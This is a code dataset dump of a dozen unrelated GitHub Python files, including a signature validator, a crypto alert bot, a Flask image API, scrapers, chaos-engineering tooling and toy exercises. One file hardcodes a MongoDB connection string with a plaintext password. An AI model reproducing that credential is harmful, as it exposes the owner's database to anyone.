https://github.com/mozilla-services/remote-settings-lambdas/issues/31\n client = Client(\n server_url=server_url,\n bucket=collection[\"bucket\"],\n collection=collection[\"collection\"],\n )\n with_tombstones = client.get_records(_since=1)\n if len(with_tombstones) == 0:\n # It never contained records. Let's assume it is newly configured.\n message += \"SKIP\"\n print(message)\n continue\n # Some records and empty signature? It will fail below.\n signature = {}\n\n try:\n # 3. Verify the signature with the public key\n pubkey = signature[\"public_key\"].encode(\"utf-8\")\n verifier = ecdsa.VerifyingKey.from_pem(pubkey)\n signature_bytes = base64.urlsafe_b64decode(signature[\"signature\"])\n verified = verifier.verify(signature_bytes, data, hashfunc=hashlib.sha384)\n assert verified, \"Signature verification failed\"\n\n # 4. Verify that the x5u certificate is valid (ie. that signature was well refreshed)\n x5u = signature[\"x5u\"]\n if x5u not in checked_certificates:\n resp = requests.get(signature[\"x5u\"])\n cert_pem = resp.text.encode(\"utf-8\")\n cert = cryptography.x509.load_pem_x509_certificate(\n cert_pem, crypto_default_backend()\n )\n assert (\n cert.not_valid_before < datetime.now()\n ), \"certificate not yet valid\"\n assert cert.not_valid_after > datetime.now(), \"certificate expired\"\n subject = cert.subject.get_attributes_for_oid(NameOID.COMMON_NAME)[\n 0\n ].value\n # eg. ``onecrl.content-signature.mozilla.org``, or\n # ``pinning-preload.content-signature.mozilla.org``\n assert subject.endswith(\n \".content-signature.mozilla.org\"\n ), \"invalid subject name\"\n checked_certificates[x5u] = cert\n\n # 5. Check that public key matches the certificate one.\n cert = checked_certificates[x5u]\n cert_pubkey_pem = cert.public_key().public_bytes(\n crypto_serialization.Encoding.PEM,\n crypto_serialization.PublicFormat.SubjectPublicKeyInfo,\n )\n assert (\n unpem(cert_pubkey_pem) == pubkey\n ), \"signature public key does not match certificate\"\n\n elapsed_time = time.time() - start_time\n message += f\"OK ({elapsed_time:.2f}s)\"\n print(message)\n except Exception:\n message += \"⚠ BAD Signature ⚠\"\n print(message)\n\n # Gather details for the global exception that will be raised.\n signed_on = metadata[\"last_modified\"]\n signed_on_date = timestamp_to_date(signed_on)\n timestamp_date = timestamp_to_date(timestamp)\n error_message = (\n \"Signature verification failed on {endpoint}\\n\"\n \" - Signed on: {signed_on} ({signed_on_date})\\n\"\n \" - Records timestamp: {timestamp} ({timestamp_date})\"\n ).format(**locals())\n error_messages.append(error_message)\n\n # Make the lambda to fail in case an exception occured\n if len(error_messages) > 0:\n raise ValidationError(\"\\n\" + \"\\n\\n\".join(error_messages))\n","repo_name":"heyitsarpit/remote-settings-lambdas","sub_path":"commands/validate_signature.py","file_name":"validate_signature.py","file_ext":"py","file_size_in_byte":6775,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"7643778848","text":"from dotenv import load_dotenv\nimport os\nimport sys\nfrom module_binance import get_ccxt_bb\nimport telegram\nimport ccxt\nimport pandas as pd\n\n\"\"\"\nBinance/detect_bb_exceed.py\n* Date: 2022. 1. 30.\n* Author: Jeon Won\n* Func: 바이낸스 차트의 %B 0 값을 상향돌파 또는 1 값을 하향돌파 시 텔레그램 메시지 전송\n* Usage: 15분봉 기준 조사 명령어는 `python3 Binance/detect_bb_exceed.py 15m` (1m, 3m, 5m, 15m, 30m, 1h, 4h, 6h, 12h, 1d 사용)\n\"\"\"\n\nload_dotenv()\n\nINTERVAL = sys.argv[1] # 차트 종류\nTELEGRAM_TOKEN = os.environ.get(\"TELEGRAM_TOKEN\") # 텔레그램 봇 토큰\nTELEGRAM_CHAT_ID = os.environ.get(\"TELEGRAM_CHAT_ID\") # 텔레그램 봇 아이디\nBB_COUNT = 20 # 볼린저 밴드(BB)의 길이\nBB_MULTIPLIER = 2 # 볼린저 밴드(BB)에서 상하한선을 정하기 위해 사용하는 곱(승수)\n\nbot = telegram.Bot(TELEGRAM_TOKEN)\nbinance = ccxt.binance()\ntickers = [\"BTC/USDT\", \"ETH/USDT\", \"XRP/USDT\", \"SOL/USDT\", \"SAND/USDT\", \"BNB/USDT\", \"AXS/USDT\", \"ATOM/USDT\", \"DOGE/USDT\", \"EOS/USDT\", \n \"BCH/USDT\", \"LTC/USDT\", \"ADA/USDT\", \"ETC/USDT\", \"LINK/USDT\", \"TRX/USDT\", \"DOT/USDT\", \"MATIC/USDT\", \"UNI/USDT\", \"ICP/USDT\", \n \"AAVE/USDT\", \"FIL/USDT\", \"XLM/USDT\", \"XTZ/USDT\", \"SUSHI/USDT\", \"THETA/USDT\", \"AVAX/USDT\", \"LUNA/USDT\", \"DASH/USDT\", \"SHIB/USDT\", \n \"XEM/USDT\", \"MANA/USDT\", \"GALA/USDT\", \"DYDX/USDT\", \"CRV/USDT\", \"NEAR/USDT\", \"EGLD/USDT\", \"KSM/USDT\", \"AR/USDT\", \"REN/USDT\", \n \"FTM/USDT\"]\nalert_0_list = [] # %B 0 값 상향돌파 시 텔레그램 메시지 보낼 ticker 리스트\nalert_1_list = [] # %B 1 값 하향돌파 시 텔레그램 메시지 보낼 ticker 리스트\n\n# 각 ticker 조사\nfor ticker in tickers:\n # ccxt로 ticker의 BB_COUNT+1개 만큼의 list를 얻어옴\n # 0 ~ BB_COUNT 범위의 list는 직전 볼린저밴드 계��용\n # 1 ~ BB_COUNT+1 범위의 list는 현재 볼린저밴드 계산용\n ohlcvs = binance.fetch_ohlcv(ticker, INTERVAL, limit=BB_COUNT+1)\n\n prev_ohlcvs = ohlcvs[0:len(ohlcvs)-1] # 직전 기준 BB_COUNT개의 list\n current_ohlcvs = ohlcvs[1:len(ohlcvs)] # 현재 기준 BB_COUNT개의 list\n\n prev_bb = get_ccxt_bb(ticker, prev_ohlcvs, BB_MULTIPLIER) # 직전 기준 볼린저밴드 값\n current_bb = get_ccxt_bb(ticker, current_ohlcvs, BB_MULTIPLIER) # 현재 기준 볼리저밴드 값\n\n prev_per_b = prev_bb[\"per_b\"] # 직전 기준 %B 값\n current_per_b = current_bb[\"per_b\"] # 현재 기준 %B 값\n\n # 직전 -> 현재 %B값이 0을 상향돌파한 ticker를 텔레그램 메시지 보낼 ticker 리스트에 추가\n if(prev_per_b < 0 and current_per_b > 0):\n alert_0_list.append(ticker)\n \n # 직전 -> 현재 %B값이 1을 하향돌파한 ticker를 텔레그램 메시지 보낼 ticker 리스트에 추가\n if(prev_per_b > 1 and current_per_b < 1):\n alert_1_list.append(ticker)\n \n# 텔레그램 메시지 전송\nif alert_0_list:\n message = f\"Binance {INTERVAL} 차트 볼린저밴드 %B 0 상향돌파 Tickers: {alert_0_list}\"\n bot.sendMessage(TELEGRAM_CHAT_ID, text=message)\nif alert_1_list:\n message = f\"Binance {INTERVAL} 차트 볼린저밴드 %B 1 하향돌파 Tickers: {alert_1_list}\"\n bot.sendMessage(TELEGRAM_CHAT_ID, text=message)","repo_name":"jeon-won/crypto-bot-python","sub_path":"Binance/detect_bb_exceed.py","file_name":"detect_bb_exceed.py","file_ext":"py","file_size_in_byte":3256,"program_lang":"python","lang":"ko","doc_type":"code","stars":6,"dataset":"github-code","pt":"53"} +{"seq_id":"504973455","text":"import logging\n\nfrom flask import request\nfrom flask_restplus import Resource\nfrom flask_rest_app.api.imageops.dboperation import createImage\nfrom flask_rest_app.api.imageops.dboperation import deleteImage\nfrom flask_rest_app.api.imageops.serializers import (imageObject,\n returnImageObject)\nfrom flask_rest_app.api.restplus import api\nfrom flask_rest_app.api.authorization import auth\nfrom flask_rest_app.database.models import Image\n\nfrom flask_rest_app.api.imageops.imageopspil import (blackAndWhite,\n createSepia, xorSynth, pixelize, line, blur, contrast, mirror, flip,\n swapChannels, greyscale, mask, invert)\n\nlog = logging.getLogger(__name__)\n\nns = api.namespace('imageOps', description='Image operations')\n\n@ns.route('/')\nclass ImageResources(Resource):\n '''Image resource'''\n @ns.marshal_with(returnImageObject)\n def get(self):\n '''Get all Images'''\n image = Image.query.all()\n print (image)\n return image\n\n @auth.login_required\n @ns.expect(imageObject)\n @ns.marshal_with(imageObject)\n def post(self):\n '''Insert the image in database'''\n image = createImage(request.json)\n return image, 201\n\n@ns.route('/')\nclass ImageResource(Resource):\n '''Get a specific launcher build'''\n @ns.marshal_with(returnImageObject)\n def get(self, id):\n '''Get specific Image using id'''\n print (id)\n image = Image.query.filter(Image.id == id).one()\n print (image)\n return image\n\n @auth.login_required\n @ns.response(204, 'Image successfully deleted.')\n def delete(self, id):\n '''Delete the Image using id'''\n deleteImage(id)\n return None, 204\n\n@ns.route('/blackWhite')\nclass ImageBlackWhiteOp(Resource):\n '''Image Resource'''\n @auth.login_required\n @ns.expect(imageObject)\n @ns.marshal_with(returnImageObject)\n def post(self):\n '''Insert the image and convert to black and white'''\n image = createImage(request.json)\n blackAndWhite(image.imageLocalLocation)\n return image, 201\n\n@ns.route('/Sepia')\nclass ImageSepiaOp(Resource):\n '''Image Resource'''\n @auth.login_required\n @ns.expect(imageObject)\n @ns.marshal_with(returnImageObject)\n def post(self):\n '''Insert the image and sepia tone it'''\n image = createImage(request.json)\n createSepia(image.imageLocalLocation)\n return image, 201\n\n@ns.route('/Invert')\nclass ImageInvertOp(Resource):\n '''Image Resource'''\n @auth.login_required\n @ns.expect(imageObject)\n @ns.marshal_with(returnImageObject)\n def post(self):\n '''Insert the image and invert it'''\n image = createImage(request.json)\n invert(image.imageLocalLocation)\n return image, 201\n\n@ns.route('/Mask')\nclass ImageMaskOp(Resource):\n '''Image Resource'''\n @auth.login_required\n @ns.expect(imageObject)\n @ns.marshal_with(returnImageObject)\n def post(self):\n '''Insert the image and Mask it'''\n image = createImage(request.json)\n mask(image.imageLocalLocation)\n return image, 201\n\n@ns.route('/Grey')\nclass ImageGreyOp(Resource):\n '''Image Resource'''\n @auth.login_required\n @ns.expect(imageObject)\n @ns.marshal_with(returnImageObject)\n def post(self):\n '''Insert the image and Greyscale'''\n image = createImage(request.json)\n greyscale(image.imageLocalLocation)\n return image, 201\n\n@ns.route('/SwapChannel')\nclass ImageSwapChannelOp(Resource):\n '''Image Resource'''\n @auth.login_required\n @ns.expect(imageObject)\n @ns.marshal_with(returnImageObject)\n def post(self):\n '''Insert the image and Swap its rgb channels'''\n image = createImage(request.json)\n swapChannels(image.imageLocalLocation)\n return image, 201\n\n@ns.route('/Flip')\nclass ImageFlipOp(Resource):\n '''Image Resource'''\n @auth.login_required\n @ns.expect(imageObject)\n @ns.marshal_with(returnImageObject)\n def post(self):\n '''Insert the image and flip it'''\n image = createImage(request.json)\n flip(image.imageLocalLocation)\n return image, 201\n\n@ns.route('/Mirror')\nclass ImageMirrorOp(Resource):\n '''Image Resource'''\n @auth.login_required\n @ns.expect(imageObject)\n @ns.marshal_with(returnImageObject)\n def post(self):\n '''Insert the image and Mirror'''\n image = createImage(request.json)\n mirror(image.imageLocalLocation)\n return image, 201\n\n@ns.route('/Contrast')\nclass ImageContrastOp(Resource):\n '''Image Resource'''\n @auth.login_required\n @ns.expect(imageObject)\n @ns.marshal_with(returnImageObject)\n def post(self):\n '''Insert the image and contrast it'''\n image = createImage(request.json)\n contrast(image.imageLocalLocation)\n return image, 201\n\n@ns.route('/Blur')\nclass ImageBlurOp(Resource):\n '''Image Resource'''\n @auth.login_required\n @ns.expect(imageObject)\n @ns.marshal_with(returnImageObject)\n def post(self):\n '''Insert the image and Blur'''\n image = createImage(request.json)\n blur(image.imageLocalLocation)\n return image, 201\n\n@ns.route('/Line')\nclass ImageLineOp(Resource):\n '''Image Resource'''\n @auth.login_required\n @ns.expect(imageObject)\n @ns.marshal_with(returnImageObject)\n def post(self):\n '''Insert the image and find its fractal lines'''\n image = createImage(request.json)\n line(image.imageLocalLocation)\n return image, 201\n\n@ns.route('/Pixelize')\nclass ImagePixelizeOp(Resource):\n '''Image Resource'''\n @auth.login_required\n @ns.expect(imageObject)\n @ns.marshal_with(returnImageObject)\n def post(self):\n '''Insert the image and pixelize it'''\n image = createImage(request.json)\n pixelize(image.imageLocalLocation)\n return image, 201\n\n@ns.route('/Xor')\nclass ImageXorOp(Resource):\n '''Image Resource'''\n @auth.login_required\n @ns.expect(imageObject)\n @ns.marshal_with(returnImageObject)\n def post(self):\n '''Insert the image and do xorSynth over it'''\n image = createImage(request.json)\n xorSynth(image.imageLocalLocation)\n return image, 201\n","repo_name":"cjsanjay/flask_nginx_docker_app","sub_path":"flask_rest_app/flask_rest_app/api/imageops/endpoints/image.py","file_name":"image.py","file_ext":"py","file_size_in_byte":6242,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6610985633","text":"import sys\nimport subprocess\nimport time\nimport os\nimport tempfile\nimport requests\nimport threading\nimport base64\n\nabort_path = os.path.join(\n os.path.dirname(os.path.dirname(sys.argv[1])),\n 'abort-key'\n)\n\ndef abort():\n\n if not os.path.exists(abort_path):\n subprocess.check_call('gsutil cp %s abort.key' % abort_path, shell=True)\n print('<<>>')\n with open('abort.key', 'rb') as r:\n response = requests.post(\n os.environ.get(\"SIGNATURE_ENDPOINT\"),\n headers={\n 'Content-Type': 'application/json'\n },\n json={\n 'key': base64.b64encode(r.read()),\n 'id': os.environ.get(\"LAPDOG_SUBMISSION_ID\")\n }\n )\n if response.status_code == 200:\n response = requests.get('http://localhost:8000/api/workflows/v1/query?status=Running')\n print(\"(%d) : %s\" % (response.status_code, response.text))\n for workflow in response.json()['results']:\n print(\"WORKFLOW:\", workflow)\n print(requests.post('http://localhost:8000/api/workflows/v1/%s/abort' % workflow['id']).text)\n # for workflow in requests.get('http://localhost:8000/api/workflows/v1/query?status=Running').json():\n # print(requests.post('http://localhost:8000/api/workflows/v1/%s/abort' % workflow['id']).text)\n print(\"<<>>\")\n # subprocess.check_call('gsutil cp %s %s' % (handle.name, sys.argv[1]), shell=True)\n # sys.exit(\"Aborted\")\n else:\n print('<<>>')\n\ndef abort_worker():\n while True:\n for i in range(60):\n time.sleep(2)\n if subprocess.call('gsutil ls %s' % abort_path, shell=True) == 0:\n # abort key located\n print(\"ABORTING\")\n abort()\n\nthread = threading.Thread(\n target=abort_worker\n) # abort thread\nthread.daemon = True\nthread.start()\n\n\nclass BatchWriter:\n \"\"\"\n Better Log batching system\n Dispatches a chunk of log text after a set time or if the buffer reaches a set size\n Both thresholds increase as the total log volume increases\n \"\"\"\n\n def __init__(self):\n self.batch_start = None\n self.batch_contents = ''\n self.log_volume = 0\n self.lock = threading.Condition()\n self.thread = threading.Thread(\n target=self._threadworker,\n name=\"Batch writing thread\",\n )\n self.thread.daemon = True\n self.thread.start()\n\n def write(self, text):\n with self.lock:\n if self.batch_start is None:\n self.batch_start = time.time()\n self.batch_contents += text.rstrip() + '\\n'\n if self.dispatch_time() or self.dispatch_volume():\n self.lock.notify_all()\n\n def dispatch_time(self):\n if self.log_volume > 1073741824:\n wait_time = 1800\n elif self.log_volume > 52428800:\n wait_time = 300\n else:\n wait_time = 60\n return self.batch_start is not None and time.time() - self.batch_start >= wait_time\n\n def dispatch_volume(self):\n if self.log_volume > 1073741824:\n wait_size = 4096\n elif self.log_volume > 52428800:\n wait_size = 2048\n else:\n wait_size = 1024\n return len(self.batch_contents) >= wait_size\n\n def _threadworker(self):\n with tempfile.NamedTemporaryFile('w') as tmp:\n while True:\n with self.lock:\n while not (self.dispatch_time() or self.dispatch_volume()):\n self.lock.wait(10)\n tmp.write(self.batch_contents)\n self.log_volume += (\n self.log_volume # Yes we want to include this, because the upload re-writes the blob\n + len(self.batch_contents)\n )\n self.batch_contents = ''\n self.batch_start = None\n tmp.flush()\n subprocess.check_call('gsutil -h \"Content-Type:text/plain\" cp %s %s' % (tmp.name, sys.argv[1]), shell=True)\n\nwriter = BatchWriter()\nwhile True:\n line = input() # Dumb, but will crash when stdin closes\n if line.rstrip() == '<<>>':\n sys.exit(0)\n writer.write(line)\n # tmp.write('\\n(VOLUME %d)\\n' % volume)\n print(line.rstrip())\n","repo_name":"getzlab/lapdog","sub_path":"lapdog/cromwell/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":4428,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"36680427022","text":"from datetime import datetime, time, date, timedelta\nfrom threading import Thread\nfrom time import sleep\nimport requests\nfrom bs4 import BeautifulSoup\nimport math\nfrom triggers.data.text_data import TextData\n\nclass MeteoFranceData(Thread, TextData):\n name = \"Météo France\" \n meteo_path = \"/grenoble/38000\" \n min_temp = None\n max_temp = None\n weather = None\n variables_str = [None,None,None]\n data_str = \"Météo : {0}, {1}, temps : {2}.\"\n\n last_fetch = datetime.min\n nb_error = 0\n status = \"INIT\"\n error_code = None\n _runtime_updated = False\n enabled = True\n\n def load_configuration(self, configuration, runtime):\n super(MeteoFranceData, self).load_configuration(configuration,runtime)\n if \"meteoPath\" in configuration:\n self.meteo_path = configuration[\"meteoPath\"]\n if \"stringData\" in configuration:\n self.data_str = configuration[\"stringData\"]\n\n def __init__(self, configuration, runtime):\n Thread.__init__(self)\n TextData.__init__(self,configuration,runtime)\n\n def fetch_data(self): \n if not self.enabled:\n return\n self.last_fetch = datetime.now()\n\n self.min_temp = None\n self.max_temp = None\n self.weather = None\n self.variables_str[0] = \"\"\n self.variables_str[1] = \"\"\n self.variables_str[2] = \"\"\n self.status = \"INIT\"\n\n result = None\n try:\n result = requests.get(\"http://www.meteofrance.com/previsions-meteo-france\"+self.meteo_path, timeout=5) \n except requests.exceptions.Timeout:\n self._set_error_code(\"GET_DATA_TIMEOUT\")\n return \n\n soup = BeautifulSoup(result.text, 'html.parser') \n liste_jours = soup.findAll(\"div\",{\"class\": \"liste-jours\"})\n if liste_jours is None or len(liste_jours) == 0:\n self._set_error_code(\"LISTE_JOURS_NOT_FOUND\")\n return\n \n active = liste_jours[0].findAll(\"li\",{\"class\": \"active\"})\n if active is None or len(active) == 0:\n self._set_error_code(\"ACTIVE_NOT_FOUND\")\n return\n\n min_temperature = active[0].findAll(\"span\",{\"class\": \"min-temp\"})\n if min_temperature is None or len(min_temperature) == 0:\n self._set_error_code(\"MIN_TEMPERATURE_NOT_FOUND\")\n return\n\n max_temperature = active[0].findAll(\"span\",{\"class\": \"max-temp\"})\n if max_temperature is None or len(max_temperature) == 0:\n self._set_error_code(\"MAX_TEMPERATURE_NOT_FOUND\")\n return\n\n self.min_temp = min_temperature[0].text\n self.max_temp = max_temperature[0].text\n self.weather = active[0].attrs[\"title\"]\n self.variables_str[0] = self.min_temp\n self.variables_str[1] = self.max_temp\n self.variables_str[2] = self.weather\n self.status = \"OK\"\n if (self.error_code is not None):\n self.error_code = None\n self.runtime_updated = True\n self.nb_error = 0\n print(\"[\"+datetime.now().isoformat()+\"] Meteo france : \"+self.data_str.format(self.min_temp, self.max_temp, self.weather))\n \n def run(self):\n while True:\n difference_fetch = (datetime.now() - self.last_fetch).total_seconds() \n if (self.status == \"ERROR\" and difference_fetch > 60 * min(math.pow(2,self.nb_error),1440)):\n self.fetch_data()\n elif (difference_fetch >= 3 * 60 * 60 ):\n self.fetch_data()\n sleep(60) ","repo_name":"elblaa/elreveil","sub_path":"triggers/data/data_meteo.py","file_name":"data_meteo.py","file_ext":"py","file_size_in_byte":3575,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12855341912","text":"import random\nfrom typing import List\n\n\nclass Location:\n def __init__(self, name, space):\n self.name = name\n self.space = space\n\n\nclass Cat:\n def __init__(self, location: List[Location], name, age, weight, current_location: Location, sq_area):\n self.location = location\n self.name = name\n self.age = age\n self.weight = weight\n self.current_location = current_location\n self.sq_area = sq_area\n self.change_location(current_location.name)\n\n def change_location(self, lol_location):\n\n def valid_location(location, sq_area, lol_location):\n if location.name != lol_location:\n if location.space > sq_area * 2:\n return True\n elif location.space < sq_area / 2:\n return True\n return False\n\n list_filter = list(filter((lambda x: valid_location(x, self.sq_area, lol_location)), self.location))\n self.current_location = random.choice(list_filter)\n\n def cat_dead(self):\n if self.age > 20:\n print('кот сдох')\n\n\nbox = Location(\"Box\", 3)\nchair = Location(\"Chair\", 6)\nfridge = Location(\"Fridge\", 18)\n\ncat_place = [box, chair, fridge]\ncat = Cat(cat_place, \"Chmo\", 21, 21, chair, 21)\ncat.cat_dead()\n\nprint(cat.current_location.name)\n","repo_name":"nester256/Tasks","sub_path":"Practice/11/7.11.22/class_work.py","file_name":"class_work.py","file_ext":"py","file_size_in_byte":1325,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"15301950653","text":"import pymongo\n\n# Writes JSON object to local MongoDB database\ndef write_mongo_local(test_data):\n\n myclient = pymongo.MongoClient(\"mongodb+srv://woz:THeIGuana2306!)@clusterinitial.mdrttii.mongodb.net/?retryWrites=true&w=majority\")\n mydb = myclient[\"weather\"]\n mycol = mydb[\"melb_hourly\"]\n x = mycol.insert_many(test_data)\n\n return x.inserted_ids\n\n\n\n","repo_name":"willosullivan/-Big-Data-Weather-API","sub_path":"mongodb.py","file_name":"mongodb.py","file_ext":"py","file_size_in_byte":354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70006818087","text":"vowel=[\"A\",\"E\",\"I\",\"O\",\"U\"]\r\nconsonants=[\"B\",\"C\",\"D\",\"F\",\"G\",\"H\",\"J\",\"K\",\"L\",\"M\",\"N\",\"P\",\"Q\",\"R\",\"S\",\"T\",\"V\",\"W\",\"X\",\"Y\",\"Z\"]\r\nb=input(\"\")\r\nl_string=len(b)\r\nlist_string=[]\r\nvowel_list=[]\r\nconsonant_list=[]\r\nfor i in range(l_string):\r\n c=b[i]\r\n list_string.append(c)\r\nrange_string=1\r\nmain=0\r\nwhile mainconsonant_win:\r\n print(\"Kevin\",vowel_win)\r\nelif vowel_win==consonant_win:\r\n print(\"Draw\")\r\nelse:\r\n print(\"Stuart\",consonant_win)\r\n","repo_name":"quos21/harshit","sub_path":"Miniongame.py","file_name":"Miniongame.py","file_ext":"py","file_size_in_byte":1202,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10476843848","text":"from math import log, sqrt, exp\nfrom typing import Tuple\nfrom scipy.optimize import fsolve\nfrom scipy.stats import norm\n\n\nclass ContingentClaimAnalysis:\n \"\"\":doc:`/measures/contingent_claim_analysis`\"\"\"\n\n def __init__(self) -> None:\n pass\n\n @staticmethod\n def estimate(\n equity: float,\n volatility: float,\n risk_free_rate: float,\n default_barrier: float,\n time_to_maturity: float,\n cds_spread: float,\n ) -> Tuple[float, float]:\n r\"\"\"Systemic risk based on contingent claim analysis (CCA).\n\n Args:\n equity (float): the market value of the equity of the firm.\n volatility (float): the volatility of equity.\n risk_free_rate (float): the risk-free rate in annualized terms.\n default_barrier (float): the face value of the outstandind debt at maturity.\n time_to_maturity (float): the time to maturity of the debt.\n cds_spread (float): the CDS spread for the firm.\n\n Returns:\n Tuple[float, float]: A tuple of put price and the firm's contribution to the systemic risk indicator (put price - CDS put price).\n \"\"\"\n\n def cca_func(x, e, vol, rf, d, t):\n init_e, init_vol = x\n d1 = (log(pow(init_e, 2) / d) + (rf + (pow(init_vol, 4)) / 2) * t) / (\n pow(init_vol, 2) * sqrt(t)\n )\n d2 = d1 - pow(init_vol, 2) * sqrt(t)\n\n eqty = e - init_e**2 * norm.cdf(d1) + d * exp(-rf * t) * norm.cdf(d2)\n sigm = e * vol - init_e**2 * init_vol**2 * norm.cdf(d1)\n\n return eqty, sigm\n\n # We need to solve a system of non-linear equations for asset price and asset volatility\n # x = [equity, volatility]\n x = fsolve(\n cca_func,\n (equity, volatility), # initial values set to equity and its volatility\n args=(\n equity,\n volatility,\n risk_free_rate,\n default_barrier,\n time_to_maturity,\n ),\n )\n\n # We solved for (asset price)^1/2 and (asset volatility)^1/2 to ensure the\n # values are positive. We recover asset price and asset volatility here.\n x = x**2\n\n # Solve for implied price of put\n d1 = (\n log(x[0] / default_barrier)\n + (risk_free_rate + (x[1] ** 2) / 2) * time_to_maturity\n ) / (x[1] * sqrt(time_to_maturity))\n d2 = d1 - x[1] * sqrt(time_to_maturity)\n\n # The price of the put\n put_price = default_barrier * exp(\n -risk_free_rate * time_to_maturity\n ) * norm.cdf(-d2) - x[0] * norm.cdf(-d1)\n\n # Solve for price of CDS implied put\n # Risky debt\n debt = default_barrier * exp(-risk_free_rate * time_to_maturity) - put_price\n\n # The price of the CDS put option\n cds_put = (\n (\n 1\n - exp(\n -(cds_spread / 10000)\n * (default_barrier / debt - 1)\n * time_to_maturity\n )\n )\n * default_barrier\n * exp(-risk_free_rate * time_to_maturity)\n )\n\n return put_price, put_price - cds_put\n","repo_name":"mgao6767/frds","sub_path":"src/frds/measures/_contingent_claim_analysis.py","file_name":"_contingent_claim_analysis.py","file_ext":"py","file_size_in_byte":3264,"program_lang":"python","lang":"en","doc_type":"code","stars":59,"dataset":"github-code","pt":"53"} +{"seq_id":"30883899395","text":"from typing import Any, Dict, List\n\nfrom chaosaws import aws_client\nfrom chaosaws.ssm.actions import send_command as send_command_wrapped\nfrom chaosaws.types import AWSResponse\nfrom chaoslib.exceptions import FailedActivity\nfrom chaoslib.types import Configuration, Secrets\nfrom devlearnops import select_items\nfrom logzero import logger\n\n__all__ = [\"send_command\"]\n\n\ndef send_command(\n document_name: str,\n targets: List[Dict[str, Any]] = None,\n targets_percent: int = 100,\n targets_count: int = None,\n document_version: str = \"$DEFAULT\",\n parameters: Dict[str, Any] = None,\n timeout_seconds: int = 60,\n max_concurrency: str = None,\n max_errors: str = \"0\",\n configuration: Configuration = None,\n secrets: Secrets = None,\n) -> AWSResponse:\n \"\"\"\n Wraps the send_command action to allow selecting a subset of instances to attack.\n\n An SSM document defines the actions that SSM performs on your managed.\n For more information about SSM SendCommand:\n https://docs.aws.amazon.com/systems-manager/latest/APIReference/API_SendCommand.html\n https://boto3.amazonaws.com/v1/documentation/api/latest/reference/services/ssm.html#SSM.Client.send_command\n \"\"\"\n # pylint: disable=too-many-arguments\n\n client = aws_client(\"ssm\", configuration, secrets)\n\n results = client.describe_instance_information(\n Filters=targets,\n )\n instances = select_items(\n results[\"InstanceInformationList\"], count=targets_count, percent=targets_percent\n )\n\n instance_ids = list(map(lambda i: i[\"InstanceId\"], instances))\n if not instance_ids:\n raise FailedActivity(\n \"Could not select valid instances from Systems Manager fleet.\"\n \" Make sure EC2 instances are correctly registered in Systems Manager\"\n \" or use use more inclusive [count|percent] attributes.\"\n )\n logger.info(\"Selecting SSM managed instances: %s\", str(instance_ids))\n\n if not max_concurrency:\n max_concurrency = str(len(instance_ids))\n\n return send_command_wrapped(\n document_name=document_name,\n targets=[{\"Key\": \"InstanceIds\", \"Values\": instance_ids}],\n document_version=document_version,\n parameters=parameters,\n timeout_seconds=timeout_seconds,\n max_concurrency=max_concurrency,\n max_errors=max_errors,\n configuration=configuration,\n secrets=secrets,\n )\n","repo_name":"DevLearnOps/chaostoolkit-starter-pack-aws","sub_path":"modules/devlearnops/aws/ssm/actions.py","file_name":"actions.py","file_ext":"py","file_size_in_byte":2410,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72394890088","text":"import sys\nimport PyQt5.QtWidgets as QW\nimport PyQt5.QtMultimedia as QM\nimport PyQt5.QtCore as QC\n\n\nclass WidgetMusicPlayer(QW.QWidget):\n def __init__(self):\n super().__init__()\n\n self.player = QM.QMediaPlayer()\n self.btn_play = QW.QPushButton('Play')\n self.btn_pause = QW.QPushButton('Pause')\n\n # init method\n self.init_ui()\n self.init_event()\n self.init_method()\n\n def init_ui(self):\n self.btn_play.setFixedWidth(100)\n self.btn_pause.setFixedWidth(100)\n\n # layout\n hbox0 = QW.QHBoxLayout()\n hbox0.addWidget(self.btn_play)\n hbox0.addWidget(self.btn_pause)\n hbox0.addStretch()\n self.setLayout(hbox0)\n\n def init_method(self):\n self.player.setNotifyInterval(100)\n\n def init_event(self):\n self.btn_play.clicked.connect(self.play_handler)\n self.btn_pause.clicked.connect(self.pause_handler)\n\n def play_handler(self):\n self.player.play()\n\n def pause_handler(self):\n self.player.pause()\n\n def set_contents(self, file_path):\n self.player.setMedia(\n QM.QMediaContent(QC.QUrl.fromLocalFile(file_path))\n )\n\n\ndef main():\n app = QW.QApplication(sys.argv)\n\n\n w = WidgetMusicPlayer()\n w.move(600, 500)\n # w.set_contents(file_path)\n w.show()\n\n sys.exit(app.exec_())\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"fkubota/spectrogram-tree","sub_path":"src/widget_music_player.py","file_name":"widget_music_player.py","file_ext":"py","file_size_in_byte":1406,"program_lang":"python","lang":"en","doc_type":"code","stars":43,"dataset":"github-code","pt":"53"} +{"seq_id":"71195147369","text":"\"\"\"Game runner board.\"\"\"\n\nfrom enum import Enum\nfrom typing import List, Sequence, Union\n\n\nclass FieldState(Enum):\n EMPTY = \" \"\n SHIP = \"O\"\n HIT = \"H\"\n MISSED = \"X\"\n\n\nclass ShotResult(Enum):\n MISS = \"miss\"\n PREVIOUS_MISS = \"previous_miss\"\n HIT = \"hit\"\n PREVIOUS_HIT = \"previous_hit\"\n INVALID = \"invalid\"\n\n\nclass Field:\n _transitions = {\n FieldState.EMPTY: (FieldState.MISSED, ShotResult.MISS),\n FieldState.SHIP: (FieldState.HIT, ShotResult.HIT),\n FieldState.HIT: (FieldState.HIT, ShotResult.PREVIOUS_HIT),\n FieldState.MISSED: (FieldState.MISSED, ShotResult.PREVIOUS_MISS)\n }\n\n def __init__(self) -> None:\n \"\"\"Instantiate an empty field.\"\"\"\n self.state = FieldState.EMPTY\n\n def drop_bomb(self) -> ShotResult:\n \"\"\"\n Drop bomb on field. Field will change its state appropriately\n and return an informative result to the user.\n\n :return: Informative shot result\n 